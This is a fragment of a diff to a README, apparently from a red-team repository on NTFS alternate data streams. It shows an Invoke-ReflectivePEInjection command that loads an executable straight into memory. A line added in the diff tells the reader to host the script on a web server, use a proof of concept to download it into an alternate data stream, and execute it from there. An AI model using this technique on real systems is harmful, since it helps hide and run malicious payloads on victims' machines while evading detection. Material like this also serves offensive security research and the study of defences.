davehardy20/Alternate-Data-Streams/README.md

 Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
 ```

+Now host this script on your web server and use the POC to download and embed the script into an ADS and execute or use another method.

 The options here are as broad and varied as your imagination.